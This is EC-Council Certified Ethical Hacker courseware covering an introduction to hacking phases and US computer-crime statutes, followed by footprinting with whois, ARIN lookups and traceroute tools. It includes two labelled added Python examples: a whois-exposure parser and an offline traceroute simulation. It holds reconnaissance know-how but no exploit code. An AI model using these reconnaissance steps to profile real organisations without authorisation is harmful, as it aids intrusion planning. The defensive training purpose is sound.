• Name
• Company Affiliation
• Title / Function
• Job Responsibility
• System security related experience
• Expectations
Course Materials

• Identity Card
• Student Courseware
• Lab Manual / Workbook
• Compact Disc
• Course Evaluation
• Reference Materials
Course Outline

• Module I: Introduction to Ethical Hacking
• Module II: Footprinting
• Module III: Scanning
• Module IV: Enumeration
• Module V: System Hacking
• Module VI: Trojans and Backdoors
• Module VII: Sniffers
• Module VIII: Denial of Service
• Module IX: Social Engineering
• Module X: Session Hijacking
• Module XI: Hacking Web Servers
• Module XII: Web Application Vulnerabilities
• Module XIII: Web Based Password Cracking Techniques
• Module XIV: SQL Injection
• Module XV: Hacking Wireless Networks
• Module XVI: Viruses
• Module XVII: Novell Hacking
• Module XVIII: Linux Hacking
• Module XIX: Evading IDS, Firewalls and Honeypots
• Module XX: Buffer Overflows
• Module XXI: Cryptography



EC-Council Certified e-business Certification Program

There are five e-Business certification tracks under the EC-Council accreditation body:

1. Certified e-Business Associate
2. Certified e-Business Professional
3. Certified e-Business Consultant
4. E++ Certified Technical Consultant
5. Certified Ethical Hacker
EC-Council Certified Ethical Hacker

Certified Ethical Hacker Track

Complete the following steps:

1. START: Attend Ethical Hacking Training
2. Pass the following exam: Ethical Hacking and Countermeasures Exam (312-50)
3. Certified Ethical Hacker (C|EH)
Student Facilities

• Class Hours
• Building Hours
• Parking
• Restrooms
• Meals
• Phones
• Smoking
• Recycling

• Lab sessions are designed to reinforce the classroom sessions.
• The sessions are intended to give hands-on experience only and do not guarantee proficiency.
Ethical Hacking

Module I: Introduction to Ethical Hacking

Module Objective

• Understanding the importance of security
• Introducing ethical hacking and essential terminology for the module
• Understanding the different phases involved in an exploit by a hacker
• Overview of attacks and identification of exploit categories
• Comprehending ethical hacking
• Legal implications of hacking
• Hacking, law and punishment
Problem Definition - Why Security?

• Evolution of technology focused on ease of use
• Increasing complexity of computer infrastructure administration and management
• Decreasing skill level needed for exploits
• Direct impact of security breach on corporate asset base and goodwill
• Increased networked environment and network-based applications
Can Hacking Be Ethical?

• The noun 'hacker' refers to a person who enjoys learning the details of computer systems and stretching their capabilities.
• The verb 'hacking' describes the rapid development of new programs or the reverse engineering of already existing software to make the code better and more efficient.
• The term 'cracker' refers to a person who uses his hacking skills for offensive purposes.
• The term 'ethical hacker' refers to security professionals who apply their hacking skills for defensive purposes.
Essential Terminology

• Threat - An action or event that might prejudice security. A threat is a potential violation of security.
• Vulnerability - Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system.
• Target of Evaluation - An IT system, product, or component that is identified / subjected as requiring security evaluation.
• Attack - An assault on system security that derives from an intelligent threat. An attack is any action that violates security.
• Exploit - A defined way to breach the security of an IT system through a vulnerability.
Elements of Security

• Security is a state of well-being of information and infrastructures in which the possibility of successful yet undetected theft, tampering, and disruption of information and services is kept low or tolerable.
• Any hacking event will affect one or more of the essential security elements.
• Security rests on confidentiality, authenticity, integrity, and availability:
  • Confidentiality is the concealment of information or resources.
  • Authenticity is the identification and assurance of the origin of information.
  • Integrity refers to the trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
  • Availability refers to the ability to use the information or resource desired.
What Does a Malicious Hacker Do?

• Reconnaissance
  • Active / passive
• Scanning
• Gaining access
  • Operating system level / application level
  • Network level
  • Denial of service
• Maintaining access
  • Uploading / altering / downloading programs or data
• Covering tracks

[Diagram: the phase cycle - Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks]
Phase 1 - Reconnaissance

• Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack. It involves network scanning, either external or internal, without authorization.
• Business Risk - 'Notable' - Generally noted as "rattling the door knobs" to see if someone is watching and responding. Could be a future point of return when noted for ease of entry for an attack, once more is known on a broad scale about the target.

Phase 1 - Reconnaissance (contd.)

• Passive reconnaissance involves monitoring network data for patterns and clues.
  • Examples include sniffing, information gathering etc.
• Active reconnaissance involves probing the network to detect:
  • accessible hosts
  • open ports
  • location of routers
  • details of operating systems and services
Phase 2 - Scanning

• Scanning refers to the pre-attack phase when the hacker scans the network with the specific information gathered during reconnaissance.
• Business Risk - 'High' - Hackers have to get a single point of entry to launch an attack, and this could be the point of exploit when a vulnerability of the system is detected.
• Scanning can include use of dialers, port scanners, network mapping, sweeping, vulnerability scanners etc.
Phase 3 - Gaining Access

• Gaining Access refers to the true attack phase. The hacker exploits the system.
• The exploit can occur over a LAN, locally, over the Internet, offline, as a deception or theft. Examples include stack-based buffer overflows, denial of service, session hijacking, password filtering etc.
• Influencing factors include architecture and configuration of the target system, skill level of the perpetrator and initial level of access obtained.
• Business Risk - 'Highest' - The hacker can gain access at operating system level, application level or network level.
Phase 4 - Maintaining Access

• Maintaining Access refers to the phase when the hacker tries to retain his 'ownership' of the system.
• The hacker has exploited a vulnerability and can tamper with and compromise the system.
• Sometimes, hackers harden the system against other hackers as well (to own the system) by securing their exclusive access with backdoors, rootkits, Trojans and Trojan horse backdoors.
• Hackers can upload, download or manipulate data / applications / configurations on the 'owned' system.

EC-Council



Phase 5 - Covering Tracks

• Covering Tracks refers to the activities undertaken by the hacker to extend his misuse of the system without being detected.
• Reasons include the need for a prolonged stay, continued use of resources, removing evidence of hacking, avoiding legal action etc.
• Examples include steganography, tunneling, altering log files etc.
• Hackers can remain undetected for long periods or use this phase to start fresh reconnaissance on a related target system.



Hacker Classes

• Black Hats
  • Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as 'Crackers'.
• White Hats
  • Individuals professing hacker skills and using them for defensive purposes. Also known as 'Security Analysts'.
• Gray Hats
  • Individuals who work both offensively and defensively at various times.

• Ethical Hacker Classes
  • Former Black Hats
    - Reformed crackers
    - First-hand experience
    - Lesser credibility perceived
  • White Hats
    - Independent security consultants (maybe groups as well)
    - Claim to be knowledgeable about black hat activities
  • Consulting Firms
    - Part of ICT firms
    - Good credentials



Hacktivism

• Refers to 'hacking with / for a cause'.
• Comprises hackers with a social or political agenda.
• Aims at sending across a message through their hacking activity and gaining visibility for their cause and themselves.
• Common targets include government agencies, MNCs, or any other entity perceived as 'bad' or 'wrong' by these groups / individuals.
• It remains a fact, however, that gaining unauthorized access is a crime, no matter what the intent.
What Do Ethical Hackers Do?

• "If you know the enemy and know yourself, you need not fear the result of a hundred battles."
  - Sun Tzu, Art of War
• Ethical hackers try to answer:
  • What can the intruder see on the target system? (Reconnaissance and Scanning phases of hacking)
  • What can an intruder do with that information? (Gaining Access and Maintaining Access phases)
  • Does anyone at the target notice the intruder's attempts or success? (Reconnaissance and Covering Tracks phases)
• If hired by any organization, an ethical hacker asks the organization what it is trying to protect, against whom, and what resources it is willing to expend in order to gain protection.
Skill Profile of an Ethical Hacker

• Computer expert adept at technical domains.
• In-depth knowledge about target platforms (such as Windows, Unix, Linux).
• Exemplary knowledge in networking and related hardware / software.
• Knowledgeable about security areas and related issues - though not necessarily a security professional.
How Do They Go About It?

• Any security evaluation involves three components:
• Preparation - In this phase, a formal contract is signed that contains a non-disclosure clause as well as a legal clause to protect the ethical hacker against any prosecution that he may attract during the conduct phase. The contract also outlines the infrastructure perimeter, evaluation activities, time schedules and resources available to him.
• Conduct - In this phase, the evaluation technical report is prepared based on testing potential vulnerabilities.
• Conclusion - In this phase, the results of the evaluation are communicated to the organization / sponsors and corrective advice / action is taken if needed.
Modes of Ethical Hacking

• Remote network - This mode attempts to simulate an intruder launching an attack over the Internet.
• Remote dial-up network - This mode attempts to simulate an intruder launching an attack against the client's modem pools.
• Local network - This mode simulates an employee with legal access gaining unauthorized access over the local network.
• Stolen equipment - This mode simulates theft of a critical information resource such as a laptop owned by a strategist (taken by the client unaware of its owner and given to the ethical hacker).
• Social engineering - This aspect attempts to check the integrity of the organization's employees.
• Physical entry - This mode attempts to physically compromise the organization's ICT infrastructure.



Security Testing

• There are many different forms of security testing. Examples include vulnerability scanning, ethical hacking and penetration testing. Security testing can be conducted using one of two approaches:
• Black-box (with no prior knowledge of the infrastructure to be tested)
• White-box (with complete knowledge of the network infrastructure).
• Internal testing is also known as Gray-box testing, and this examines the extent of access by insiders within the network.
Deliverables

• Ethical Hacking Report
• Details the results of the hacking activity, matching it against the work schedule decided prior to the conduct phase.
• Vulnerabilities are detailed and avoidance measures suggested. Usually delivered in hard copy format for security reasons.
• Issues to consider - non-disclosure clause in the legal contract (availing the right information to the right person), integrity of the evaluation team, sensitivity of information.
Computer Crimes and Implications

• Cyber Security Enhancement Act 2002 - implicates life sentences for hackers who 'recklessly' endanger the lives of others.
• The CSI/FBI 2002 Computer Crime and Security Survey noted that 90% of the respondents acknowledged security breaches, but only 34% reported the crime to law enforcement agencies.
• The FBI computer crimes squad estimates that between 85 to 97 percent of computer intrusions are not even detected.
• Stigma associated with reporting security lapses.
Legal Perspective (US Federal Law)

Federal Criminal Code Related to Computer Crime:

• 18 U.S.C. § 1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C. § 1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C. § 1362. Communication Lines, Stations, or Systems
• 18 U.S.C. § 2510 et seq. Wire and Electronic Communications Interception and Interception of Oral Communications
• 18 U.S.C. § 2701 et seq. Stored Wire and Electronic Communications and Transactional Records Access
Section 1029

Subsection (a) Whoever -

(1) knowingly and with intent to defraud produces, uses, or traffics in one or more counterfeit access devices;

(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized access devices during any one-year period, and by such conduct obtains anything of value aggregating $1000 or more during that period;

(3) knowingly and with intent to defraud possesses fifteen or more devices which are counterfeit or unauthorized access devices;

(4) knowingly, and with intent to defraud, produces, traffics in, has control or custody of, or possesses device-making equipment;
Section 1029 (contd.)

(5) knowingly and with intent to defraud effects transactions, with 1 or more access devices issued to another person or persons, to receive payment or any other thing of value during any 1-year period the aggregate value of which is equal to or greater than [...];

(6) without the authorization of the issuer of the access device, knowingly and with intent to defraud solicits a person for the purpose of--

  (A) offering an access device; or

  (B) selling information regarding or an application to obtain an access device;

(7) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a telecommunications instrument that has been modified or altered to obtain unauthorized use of telecommunications services;
Section 1029 (contd.)

(8) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a scanning receiver;

(9) knowingly uses, produces, traffics in, has control or custody of, or possesses hardware or software, knowing it has been configured to insert or modify telecommunication identifying information associated with or contained in a telecommunications instrument so that such instrument may be used to obtain telecommunications service without authorization; or

(10) without the authorization of the credit card system member or its agent, knowingly and with intent to defraud causes or arranges for another person to present to the member or its agent, for payment, 1 or more evidences or records of transactions made by an access device.

(A) in the case of an offense that does not occur after a conviction for another offense under this section--

  • (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a), a fine under this title or imprisonment for not more than 10 years, or both; and

  • (ii) if the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine under this title or imprisonment for not more than 15 years, or both;

(B) in the case of an offense that occurs after a conviction for another offense under this section, a fine under this title or imprisonment for not more than 20 years, or both; and

(C) in either case, forfeiture to the United States of any personal property used or intended to be used to commit the offense.
Section 1030 - (a)(1)

Subsection (a) Whoever--

(1) having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information that has been determined by the United States Government pursuant to an Executive order or statute to require protection against unauthorized disclosure for reasons of national defense or foreign relations, or any restricted data, as defined in paragraph y. of section 11 of the Atomic Energy Act of 1954, with reason to believe that such information so obtained could be used to the injury of the United States, or to the advantage of any foreign nation willfully communicates, delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the same to any person not entitled to receive it, or willfully retains the same and fails to deliver it to the officer or employee of the United States entitled to receive it;
Section 1030 (2) (A) (B) (C)

(2) intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains--

  (A) information contained in a financial record of a financial institution, or of a card issuer as defined in section 1602(n) of title 15, or contained in a file of a consumer reporting agency on a consumer, as such terms are defined in the Fair Credit Reporting Act (15 U.S.C. 1681 et seq.);

  (B) information from any department or agency of the United States; or

  (C) information from any protected computer if the conduct involved an interstate or foreign communication;
Section 1030 (3) (4)

(3) intentionally, without authorization to access any nonpublic computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects that use by or for the Government of the United States;

(4) knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period;



Section 1030 (5) (A) (B)

(5)(A)(i) knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;

  (ii) intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or

  (iii) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage; and

(5)(B) by conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in the case of an attempted offense, would, if completed, have caused)--
Section 1030 (5) (B) (contd.)

  (i) loss to 1 or more persons during any 1-year period (and, for purposes of an investigation, prosecution, or other proceeding brought by the United States only, loss resulting from a related course of conduct affecting 1 or more other protected computers) aggregating at least $5,000 in value;

  (ii) the modification or impairment, or potential modification or impairment, of the medical examination, diagnosis, treatment, or care of 1 or more individuals;

  (iii) physical injury to any person;

  (iv) a threat to public health or safety; or

  (v) damage affecting a computer system used by or for a government entity in furtherance of the administration of justice, national defense, or national security;



Section 1030 (6) (7)

(6) knowingly and with intent to defraud traffics (as defined in section 1029) in any password or similar information through which a computer may be accessed without authorization, if--

  (A) such trafficking affects interstate or foreign commerce; or

  (B) such computer is used by or for the Government of the United States;

(7) with intent to extort from any person any money or other thing of value, transmits in interstate or foreign commerce any communication containing any threat to cause damage to a protected computer;
Penalties

(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(1) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and

(B) a fine under this title or imprisonment for not more than twenty years, or both, in the case of an offense under subsection (a)(1) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;

(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for not more than one year, or both, in the case of an offense under subsection (a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;



Penalties (contd.)

(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(2), or an attempt to commit an offense punishable under this subparagraph, if--

  • (i) the offense was committed for purposes of commercial advantage or private financial gain;

  • (ii) the offense was committed in furtherance of any criminal or tortious act in violation of the Constitution or laws of the United States or of any State; or

  • (iii) the value of the information obtained exceeds $5,000;

(C) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
Penalties (contd.)

(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and

(3)(B) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and
Penalties (contd.)

(4)(A) a fine under this title, imprisonment for not more than 10 years, or both, in the case of an offense under subsection (a)(5)(A)(i), or an attempt to commit an offense punishable under that subsection;

(4)(B) a fine under this title, imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(5)(A)(ii), or an attempt to commit an offense punishable under that subsection;

(4)(C) a fine under this title, imprisonment for not more than 20 years, or both, in the case of an offense under subsection (a)(5)(A)(i) or (a)(5)(A)(ii), or an attempt to commit an offense punishable under either subsection, that occurs after a conviction for another offense under this section.
Summary

• Security is critical across sectors and industries.
• Ethical Hacking is a methodology to simulate a malicious attack without causing damage.
• Hacking involves five distinct phases.
• Security evaluation includes preparation, conduct and evaluation phases.
• Cyber crime can be differentiated into two categories.
• U.S. Statutes §§ 1029 and 1030 primarily address cyber crime.
Ethical Hacking

Module II: Footprinting

Scenario

Adam is furious. He had applied for the network engineer job at targetcompany.com. He believes that he was rejected unfairly. He has a good track record, but the economic slowdown has seen many layoffs including his. He is frustrated - he needs a job and feels he has been wronged. Late in the evening he decides that he will prove his mettle.

• What do you think Adam would do?
• Where would he start and how would he go about it?
• Are there any tools that can help him in his effort?
• Can he cause harm to targetcompany.com?
• As a security professional, where can you lay checkpoints and how can you deploy countermeasures?
Module Objectives

• Overview of the Reconnaissance Phase
• Introducing Footprinting
• Understanding the information gathering methodology of hackers
• Comprehending the implications
• Learning some of the tools used for the reconnaissance phase
• Deploying countermeasures
Revisiting Reconnaissance

[Diagram: the five-phase cycle - 1 Reconnaissance, 2 Scanning, 3 Gaining Access, 4 Maintaining Access, 5 Clearing Tracks]

• Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
• It involves network scanning, either external or internal, without authorization.
Defining Footprinting

• Footprinting is the blueprinting of the security profile of an organization, undertaken in a methodological manner.
• Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
• Footprinting results in a unique organization profile with respect to the networks (Internet / Intranet / Extranet / Wireless) and systems involved.
Information Gathering Methodology

• Unearth initial information
• Locate the network range
• Ascertain active machines
• Discover open ports / access points
• Detect operating systems
• Uncover services on ports
• Map the network

[Diagram label: Footprinting]
Unearthing Initial Information

• Commonly includes:
  • Domain name lookup
  • Locations
  • Contacts (Telephone / mail)
• Information Sources:
  • Open source
  • Whois
  • Nslookup
• Hacking Tool:
  • Sam Spade

[Screenshot: Sam Spade script console for www.tar[...]. Tools menu: Zone Transfer..., SMTP Relay check..., Scan Addresses..., Crawl website..., Browse web..., Check cancels..., Fast traceroute, Slow traceroute, S-lang command..., Decode URL..., Parse email headers. Sidebar: nslookup, Whois, IP Block, Dig, Traceroute, Finger, SMTP Verify, Time, Blacklist, Abuse Lookup]

Whois

Registrant:
   targetcompany (targetcompany-DOM)
   XXX Everest Blk, A. Enclave
   Ameerpet
   Hyderabad
   Andrapradesh, 500038

   Domain Name: targetcompany.[...]

Administrative Contact:
   R****, J*** (RJXX2-ORG) targetcompany@[...]
   targetcompany
   XXX, Everest Block, A. Enclave,
   Ameerpet
   Hyderabad, Andrapradesh 500038
   IN 91 40 XXXX 329X  Fax- 91 40 XXXX 329X

Technical Contact:
   S*****, V**** (VSXX) [...]@WEBINDIA.COM
   XXX3 Inc
   Hoffman Estates, IL 60194
   US. 408/XXX-XXXX  408/XXX-XXXX

Record expires on 14-Oct-200X.
Record created on 13-Oct-1997.
Database last updated on [...] EST.

The same record, with the identifying fields generalized:

Registrant:
   targetcompany (targetcompany-DOM)
   # Street Address
   City, Province
   State, Pin, Country

   Domain Name: targetcompany.COM

Administrative Contact:
   Surname, Name (SNIDNo-ORG) targetcompany@domain.com
   targetcompany (targetcompany-DOM) # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX  Fax XXXXX

Technical Contact:
   Surname, Name (SNIDNo-ORG) targetcompany@domain.com
   targetcompany (targetcompany-DOM) # Street Address
   City, Province, State, Pin, Country
   Telephone: XXXXX  Fax XXXXX

Domain servers in listed order:
   NS1.WEBHOST.COM   XXX.XXX.XXX.XXX
   NS2.WEBHOST.COM   XXX.XXX.XXX.XXX
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Nslookup



© Nslookup is a program to query Internet domain name servers. It displays information that can be used to diagnose Domain Name System (DNS) infrastructure.

© Helps find additional IP addresses if the authoritative DNS server is known from whois.

© The MX record reveals the IP of the mail server.

© Both Unix and Windows come with an Nslookup client.

© Third-party clients are also available, e.g. Sam Spade.
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Scenario (contd.)



Adam knows that targetcompany is based at NJ. However, he decides to check it up. He runs a whois from an online whois client and notes the domain information. He takes down the email ids and phone numbers. He also discerns the domain server IPs and does an interactive Nslookup.



© Ideally, what extent of information should be revealed to Adam during this quest?

© Are there any other means of gaining information? Can he use the information at hand in order to obtain critical information?

© What are the implications for the target company? Can he cause harm to targetcompany at this stage?
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Locate the Network Range

© Commonly includes:

© Finding the range of IP addresses

© Discerning the subnet mask

© Information Sources:

© ARIN (American Registry of Internet Numbers)

© Traceroute

© Hacking Tool:

© NeoTrace
© Visual Route




Screenshot: Visual Route trace shown on a world map (callouts such as "so-2-0-0.pr1.lga4.us, Response Time: 338 ms" and "g3-9.core01.jfk02.atlas.cogentco.com, Response Time: 425 ms"). The hop table below the map reads:

 #   Name                                        RT (ms)  Network
 1   so-5-2-0.cr1.lga1.us.mfnx.net                   339  ABOVENET
 2   so-0-0-0.cr1.lga2.us.mfnx.net                   319  ABOVENET-6
 3   so-2-0-0.pr1.lga4.us.mfnx.net                   338  ABOVENET
 4   64.124.51.186.cogentco.com                      421  ABOVENET
 5   g3-9.core01.jfk02.atlas.cogentco.com            425  COGENT-NB-0000
 6   p4-0.core02.dca01.atlas.cogentco.com            400  COGENT-NB-0000
 7   p15-0.core01.dca01.atlas.cogentco.com           421  COGENT-NB-0000
 8   p14-0.core01.dfw01.atlas.cogentco.com           426  COGENT-NB-0000
 9   p15-0.core02.dfw01.atlas.cogentco.com           441  COGENT-NB-0000
10   p15-0.core01.mci01.atlas.cogentco.com           421  COGENT-NB-0000
11   p5-0.core02.ord01.atlas.cogentco.com            467  COGENT-NB-0000
12   g8.ba21.b002281-1.ord01.atlas.cogentco.com      462  COGENT-NB-0000
ARIN



© ARIN allows search on the whois database to locate information on networks, autonomous system numbers (ASNs), network-related handles and other related points of contact (POC).

© ARIN whois allows querying the IP address to help find information on the strategy used for subnet addressing.
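Added example (not EC-Council courseware, Sam Spade or ARIN code) that ties the whois output and the ARIN netblock query together from the reviewing side: it parses a constructed whois record and a constructed ARIN record modelled on the templates above, lists the contacts, phone numbers and name servers they expose, and turns the "Netblock: a - b" range into CIDR notation and a subnet mask with Python's ipaddress module. Every name, address and number in the two samples is a placeholder.

```python
"""Inventory what whois / ARIN registration output exposes about a domain.

Added example (not courseware code). Both inputs are constructed samples
modelled on the masked template on the slides; all values are placeholders.
"""
import ipaddress
import re

SAMPLE_WHOIS = """\
Registrant:
   targetcompany (targetcompany-DOM)
   # Street Address
   City, Province, State, Pin, Country

   Domain Name: targetcompany.COM

   Administrative Contact:
      Surname, Name (SNIDNo-ORG) targetcompany@domain.com
      Telephone: 555-0100 Fax 555-0101
   Technical Contact:
      Surname, Name (SNIDNo-ORG) techcontact@webhost.example
      Telephone: 555-0200 Fax 555-0201

   Domain servers in listed order:
   NS1.WEBHOST.COM   198.51.100.53
   NS2.WEBHOST.COM   192.0.2.11
"""

SAMPLE_ARIN = """\
Example Corp (NETBLK-EXAMPLE-NET)
   One Example Way
   Anytown, ST 00000
   US

   Netname: EXAMPLE-NET
   Netblock: 198.51.100.0 - 198.51.100.255

   Coordinator:
      Example Corp (ZZ00-ARIN) noc@example.com
      555-0300
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
PHONE_RE = re.compile(r"Telephone:\s*(\S+)\s+Fax\s+(\S+)")
NS_RE = re.compile(r"^\s*([A-Za-z0-9.-]+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$", re.M)


def parse_whois(text):
    """Pull out the fields an attacker harvests and a defender should review."""
    domain = re.search(r"Domain Name:\s*(\S+)", text)
    phones = [p for pair in PHONE_RE.findall(text) for p in pair]
    ns_section = text.split("Domain servers in listed order:", 1)[-1]
    return {
        "domain": domain.group(1) if domain else None,
        "emails": EMAIL_RE.findall(text),
        "phones": phones,
        "name_servers": NS_RE.findall(ns_section),
    }


def parse_netblock(text):
    """Turn an ARIN 'Netblock: a - b' range into CIDR networks and a netmask."""
    netname = re.search(r"Netname:\s*(\S+)", text)
    lo, hi = re.search(r"Netblock:\s*([\d.]+)\s*-\s*([\d.]+)", text).groups()
    networks = list(ipaddress.summarize_address_range(
        ipaddress.ip_address(lo), ipaddress.ip_address(hi)))
    return {
        "netname": netname.group(1) if netname else None,
        "networks": networks,
        # a range that is one aligned block has a single mask; otherwise None
        "netmask": str(networks[0].netmask) if len(networks) == 1 else None,
        "contacts": EMAIL_RE.findall(text),
    }


def ip_in_block(ip, networks):
    """True if `ip` falls inside any of the allocated networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def exposure_report(whois_text, arin_text):
    """Summarise the publicly visible data points for a review."""
    w, a = parse_whois(whois_text), parse_netblock(arin_text)
    return {
        "domain": w["domain"],
        "exposed_emails": sorted(set(w["emails"] + a["contacts"])),
        "exposed_phones": w["phones"],
        "name_servers_in_block": [
            name for name, ip in w["name_servers"] if ip_in_block(ip, a["networks"])],
        "cidr": [str(n) for n in a["networks"]],
    }


if __name__ == "__main__":
    for key, value in exposure_report(SAMPLE_WHOIS, SAMPLE_ARIN).items():
        print(f"{key}: {value}")
```

The report is the list a defender reviews before an attacker does: which mailboxes and numbers are public, and which name servers sit inside the organisation's own allocation (a name server in the block shows an attacker where the production range is).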
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"Applying the principles of stewardship, ARIN, a nonprofit corporation, allocates Internet Protocol resources; develops consensus-based policies; and facilitates the advancement of the Internet through information and educational outreach"

Screenshot: ARIN home page with its sections: Database & Template Conversion Information Center; Registration (how to get IPv4 and IPv6 addresses, AS Numbers, and Transfer, Help Desk and Reassignment information); Meetings (upcoming ARIN meetings and sponsorship information, minutes from previous AC, BOT, PPM and Member's meetings); Library; Policy (how ARIN Policy is made, current policy discussions and policy proposal archive); Members (member benefits, how to join as a non-subscriber, list of ARIN members); Internet Info (including the transfer of 6bone address management responsibilities to RIRs).
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Screenshot: ARIN Whois Output

Output from ARIN Whois (search results for 207.46.230.218):

Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
   One Redmond Way
   Redmond, WA 98052
   US

   Netname: MICROSOFT-GLOBAL-NET
   Netblock: 207.46.0.0 - 207.46.255.255

   Coordinator:
      Microsoft (ZH39-ARIN) noc@microsoft.com
      425-936-4200

   Domain System inverse mapping provided by:
      DNS1.CP.MSFT.NET   207.46.138.20
      DNS2.CP.MSFT.NET   207.46.138.21
      DNS1.TK.MSFT.NET   207.46.232.37

IP address block allocated to the domain microsoft.com.
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Traceroute



© Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live.

© Traceroute reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs.

© As each router processes an IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator.

© Routers with DNS entries reveal the name of routers, network affiliation and geographic location.
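Added example, not from the courseware: a small Python model of the TTL mechanism just described. Each probe crosses a constructed path of routers (placeholder addresses from the documentation ranges, invented names); the router that decrements the TTL to zero answers with "time exceeded", a router that drops ICMP shows up as "*", and the destination answers the UDP probe with "port unreachable". Nothing is sent on the wire.

```python
"""Simulate the TTL mechanism traceroute relies on.

Added example (not courseware code). The path below is constructed: router
addresses come from the documentation ranges and the names are invented.
"""
from dataclasses import dataclass


@dataclass
class Router:
    address: str
    dns_name: str = ""      # empty: no PTR record, so traceroute shows only the IP
    silent: bool = False    # filters or rate-limits ICMP: the hop shows as '*'


PATH = [
    Router("192.0.2.1", "gw.office.example"),
    Router("198.51.100.9", "core01.isp.example"),
    Router("203.0.113.5", silent=True),
    Router("203.0.113.9", "edge.target.example"),
]
DESTINATION = "203.0.113.77"


def forward(ttl, path, destination):
    """Carry one probe across the path.

    Every router decrements the TTL before forwarding. The router that brings
    it to zero drops the probe and answers with ICMP 'time exceeded' (type 11),
    which is what reveals that router's address to the sender. A probe that
    reaches the destination is a UDP datagram to an unused high port, so the
    destination answers ICMP 'port unreachable' (type 3, code 3).
    """
    for router in path:
        ttl -= 1
        if ttl == 0:
            if router.silent:
                return None, None
            return "time-exceeded", router.address
    return "port-unreachable", destination


def traceroute(path, destination, max_hops=30):
    """Send probes with TTL 1, 2, 3, ... until the destination answers."""
    names = {r.address: r.dns_name for r in path}
    hops = []
    for ttl in range(1, max_hops + 1):
        reply, who = forward(ttl, path, destination)
        if reply is None:
            hops.append((ttl, "*", "", "timeout"))
            continue
        hops.append((ttl, who, names.get(who, ""), reply))
        if who == destination:
            break
    return hops


if __name__ == "__main__":
    for ttl, addr, name, reply in traceroute(PATH, DESTINATION):
        print(f"{ttl:2d}  {addr:15s}  {name:22s}  {reply}")
```

The "*" hop is the usual defensive countermeasure in practice: a router that does not generate ICMP time-exceeded messages still forwards traffic but reveals neither its address nor its name.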
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Tool: NeoTrace (Now McAfee Visual Trace)

Screenshot: NeoTrace Professional tracing www.google.com (toolbar: Target, Go, Map View, Info Pane, Save, Copy, Ping, Options, Online Help; world map with callouts such as "213.42.12.11, Response Time: 216 ms" and "www.google.com, Response Time: 533 ms").

NeoTrace shows the traceroute output visually: map view, node view and IP view. The IP view reads:

 #   IP Address       Name                                RT (ms)  % Loss  Network
 1   217.165.236.73   SAM                                       0      0%
 2   213.42.12.11                                              216      0%  AE-EMIRNET-990929
 3   213.42.12.130                                             135      0%  AE-EMIRNET-990929
 4   194.170.2.117                                             154      0%  EMIRNET-EMIRNET
 5   195.229.31.66    dxb-emix-rb.ge130.emix.ae               159      0%  AE-EMIRNET-971125
 6   195.229.0.234    dxb-emix-ra.so100.emix.ae               139      0%  EMIRNET-EMIRNET
 7   166.63.210.62    bcr2.thamesside.cw.net                  442      0%  CW-NETC52
 8   63.216.0.42      pos5-1.cr02.ash01.pccwbtn.net           713      0%  CAIS-CIDR7
 9   206.24.233.166   bhr1-pos-10-0.sterling1dc2.cw.net       446      0%  CW-05BLK
10   216.239.48.193                                            508      0%  GOOGLE
